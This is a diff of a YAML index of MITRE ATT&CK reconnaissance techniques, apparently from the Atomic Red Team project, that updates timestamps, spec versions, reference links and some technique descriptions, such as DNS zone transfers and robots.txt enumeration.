+          Distribution. Retrieved August 1, 2024.
+        url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
       - source_name: ThreatConnect Infrastructure Dec 2020
-        url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
-      name: Gather Victim Host Information
-      description: |-
-        Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
-
-        Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: reconnaissance
-      x_mitre_detection: |-
-        Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
-
-        Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_version: '1.1'
+        url: https://threatconnect.com/blog/infrastructure-research-hunting/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Internet Scan: Response Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1596.003:
     technique:
@@ -91447,7 +92124,7 @@ reconnaissance:
         url: https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2
         description: Jain, M. (2019, September 16). Export & Download — SSL Certificate
           from Server (Site URL). Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:48:37.628Z'
       name: Digital Certificates
       description: |-
         Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.
@@ -91463,8 +92140,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1597.002:
     technique:
@@ -91486,7 +92161,7 @@ reconnaissance:
         url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
         description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
           73 million user records on the dark web. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:44:43.900Z'
       name: Purchase Technical Data
       description: |-
         Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.
@@ -91502,8 +92177,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590.005:
     technique:
@@ -91531,7 +92204,7 @@ reconnaissance:
         url: https://www.circl.lu/services/passive-dns/
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:31:05.302Z'
       name: IP Addresses
       description: |-
         Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.
@@ -91547,33 +92220,33 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590.002:
     technique:
-      modified: '2022-10-21T14:32:48.393Z'
+      modified: '2024-11-11T16:13:02.196Z'
       name: DNS
       description: |-
-        Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
+        Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
 
         Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+        Adversaries may also use DNS zone transfer (DNS query type AXFR) to collect all records from a misconfigured DNS server.(Citation: Trails-DNS)(Citation: DNS-CISA)(Citation: Alexa-dns)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.2'
       type: attack-pattern
       id: attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea
       created: '2020-10-02T15:47:10.102Z'
@@ -91587,18 +92260,29 @@ reconnaissance:
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
         url: https://www.circl.lu/services/passive-dns/
+      - source_name: DNS-CISA
+        description: CISA. (2016, September 29). DNS Zone Transfer AXFR Requests May
+          Leak Domain Information. Retrieved June 5, 2024.
+        url: https://www.cisa.gov/news-events/alerts/2015/04/13/dns-zone-transfer-axfr-requests-may-leak-domain-information
       - source_name: DNS Dumpster
         description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
         url: https://dnsdumpster.com/
+      - source_name: Alexa-dns
+        description: Scanning Alexa's Top 1M for AXFR. (2015, March 29). Retrieved
+          June 5, 2024.
+        url: https://en.internetwache.org/scanning-alexas-top-1m-for-axfr-29-03-2015/
       - source_name: Sean Metcalf Twitter DNS Records
         description: Sean Metcalf. (2019, May 9). Sean Metcalf Twitter. Retrieved
-          May 27, 2022.
-        url: https://twitter.com/PyroTek3/status/1126487227712921600/photo/1
+          September 12, 2024.
+        url: https://x.com/PyroTek3/status/1126487227712921600
+      - source_name: Trails-DNS
+        description: SecurityTrails. (2018, March 14). Wrong Bind Configuration Exposes
+          the Complete List of Russian TLD's to the Internet. Retrieved June 5, 2024.
+        url: https://web.archive.org/web/20180615055527/https://securitytrails.com/blog/russian-tlds
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1596.002:
     technique:
@@ -91619,7 +92303,7 @@ reconnaissance:
       - source_name: WHOIS
         url: https://www.whois.net/
         description: NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:50:44.113Z'
       name: WHOIS
       description: |-
         Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)
@@ -91635,39 +92319,37 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1594:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
-      type: attack-pattern
-      created: '2020-10-02T16:51:50.306Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1594
-        url: https://attack.mitre.org/techniques/T1594
-      - source_name: Comparitech Leak
-        url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
-        description: Bischoff, P. (2020, October 15). Broadvoice database of more
-          than 350 million customer records exposed online. Retrieved October 20,
-          2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-02T18:52:21.278Z'
       name: Search Victim-Owned Websites
-      description: |-
-        Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)
-
-        Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).
+      description: "Adversaries may search websites owned by the victim for information
+        that can be used during targeting. Victim-owned websites may contain a variety
+        of details, including names of departments/divisions, physical locations,
+        and data about key employees such as names, roles, and contact info (ex: [Email
+        Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may
+        also have details highlighting business operations and relationships.(Citation:
+        Comparitech Leak)\n\nAdversaries may search victim-owned websites to gather
+        actionable information. Information from these sources may reveal opportunities
+        for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)
+        or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)),
+        establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585)
+        or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or
+        initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)
+        or [Phishing](https://attack.mitre.org/techniques/T1566)).\n\nIn addition
+        to manually browsing the website, adversaries may attempt to identify hidden
+        directories or files that could contain additional sensitive information or
+        vulnerable functionality. They may do this through automated activities such
+        as [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003), as
+        well as by leveraging files such as sitemap.xml and robots.txt.(Citation:
+        Perez Sitemap XML 2023)(Citation: Register Robots TXT 2015) "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - James P Callahan, Professional Paranoid
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor for suspicious network traffic that could be indicative
         of adversary reconnaissance, such as rapid successions of requests indicative
         of web crawling and/or large quantities of requests originating from a single
@@ -91675,13 +92357,41 @@ reconnaissance:
         Analyzing web metadata may also reveal artifacts that can be attributed to
         potentially malicious activity, such as referer or user-agent string HTTP/S
         fields.
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
+      created: '2020-10-02T16:51:50.306Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1594
+        external_id: T1594
+      - source_name: Perez Sitemap XML 2023
+        description: Adi Perez. (2023, February 22). How Attackers Can Misuse Sitemaps
+          to Enumerate Users and Discover Sensitive Information. Retrieved July 18,
+          2024.
+        url: https://medium.com/@adimenia/how-attackers-can-misuse-sitemaps-to-enumerate-users-and-discover-sensitive-information-361a5065857a
+      - source_name: Comparitech Leak
+        description: Bischoff, P. (2020, October 15). Broadvoice database of more
+          than 350 million customer records exposed online. Retrieved October 20,
+          2020.
+        url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
+      - source_name: Register Robots TXT 2015
+        description: Darren Pauli. (2015, May 19). Robots.txt tells hackers the places
+          you don't want them to look. Retrieved July 18, 2024.
+        url: https://www.theregister.com/2015/05/19/robotstxt/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1596.001:
     technique:
@@ -91706,7 +92416,7 @@ reconnaissance:
         url: https://www.circl.lu/services/passive-dns/
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:49:13.409Z'
       name: DNS/Passive DNS
       description: |-
         Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.
@@ -91722,8 +92432,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591.003:
     technique:
@@ -91745,7 +92453,7 @@ reconnaissance:
         url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
         description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
           Personal Voicemail Transcripts. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:38:31.983Z'
       name: Identify Business Tempo
       description: |-
         Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.
@@ -91761,8 +92469,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1592.001:
     technique:
@@ -91788,7 +92494,7 @@ reconnaissance:
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:32:10.810Z'
       name: 'Gather Victim Host Information: Hardware'
       description: |-
         Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).
@@ -91806,8 +92512,6 @@ reconnaissance:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1592.001
     atomic_tests:
     - name: Enumerate PlugNPlay Camera
@@ -91828,7 +92532,7 @@ reconnaissance:
           '
   T1598.003:
     technique:
-      modified: '2024-04-19T13:26:16.082Z'
+      modified: '2024-05-31T04:18:44.567Z'
       name: Spearphishing Link
       description: |-
         Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -91884,7 +92588,7 @@ reconnaissance:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: TrendMictro Phishing
         description: Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved
           October 20, 2020.
@@ -91935,7 +92639,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1590.004:
     technique:
@@ -91956,7 +92659,7 @@ reconnaissance:
       - source_name: DNS Dumpster
         url: https://dnsdumpster.com/
         description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:33:02.476Z'
       name: Network Topology
       description: |-
         Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.
@@ -91972,8 +92675,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590.003:
     technique:
@@ -91995,7 +92696,7 @@ reconnaissance:
         url: https://www.slideshare.net/rootedcon/carlos-garca-pentesting-active-directory-forests-rooted2019
         description: García, C. (2019, April 3). Pentesting Active Directory Forests.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:34:22.917Z'
       name: Network Trust Dependencies
       description: |-
         Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.
@@ -92011,8 +92712,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1597.001:
     technique:
@@ -92034,7 +92733,7 @@ reconnaissance:
         url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
         description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
           Intelligence Feeds. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:45:30.862Z'
       name: Threat Intel Vendors
       description: |-
         Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)
@@ -92050,12 +92749,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1589:
     technique:
-      modified: '2024-04-19T04:27:00.005Z'
+      modified: '2024-09-16T16:09:45.794Z'
       name: Gather Victim Identity Information
       description: |-
         Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, security question responses, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations.
@@ -92095,8 +92792,8 @@ reconnaissance:
         external_id: T1589
       - source_name: OPM Leak
         description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
-          Retrieved October 20, 2020.
-        url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+          Retrieved September 16, 2024.
+        url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
       - source_name: Detectify Slack Tokens
         description: Detectify. (2016, April 28). Slack bot token leakage exposing
           business critical information. Retrieved October 19, 2020.
@@ -92141,11 +92838,10 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T13:37:31.317Z'
       name: Vulnerability Scanning
       description: |-
         Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.
@@ -92185,9 +92881,8 @@ reconnaissance:
         url: https://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT-014_Vulnerability_Scanning
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1596:
     technique:
@@ -92249,7 +92944,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595:
     technique:
@@ -92275,7 +92969,7 @@ reconnaissance:
         url: https://wiki.owasp.org/index.php/OAT-004_Fingerprinting
         description: OWASP Wiki. (2018, February 16). OAT-004 Fingerprinting. Retrieved
           October 20, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T20:58:13.661Z'
       name: Active Scanning
       description: |-
         Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.
@@ -92296,8 +92990,6 @@ reconnaissance:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1589.002:
     technique:
@@ -92362,7 +93054,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1598.004:
     technique:
@@ -92410,7 +93101,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1590.006:
     technique:
@@ -92432,7 +93122,7 @@ reconnaissance:
         url: https://nmap.org/book/firewalls.html
         description: Nmap. (n.d.). Chapter 10. Detecting and Subverting Firewalls
           and Intrusion Detection Systems. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:31:54.275Z'
       name: Network Security Appliances
       description: |-
         Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.
@@ -92448,34 +93138,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593.002:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
-      type: attack-pattern
-      created: '2020-10-02T16:50:12.809Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1593.002
-        url: https://attack.mitre.org/techniques/T1593/002
-      - source_name: SecurityTrails Google Hacking
-        url: https://securitytrails.com/blog/google-hacking-techniques
-        description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
-          Retrieved October 20, 2020.
-      - source_name: ExploitDB GoogleHacking
-        url: https://www.exploit-db.com/google-hacking-database
-        description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
-          October 23, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T19:19:47.758Z'
       name: Search Engines
       description: |-
         Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -92484,15 +93150,38 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.0'
+      type: attack-pattern
+      id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
+      created: '2020-10-02T16:50:12.809Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1593/002
+        external_id: T1593.002
+      - source_name: SecurityTrails Google Hacking
+        description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
+          Retrieved September 12, 2024.
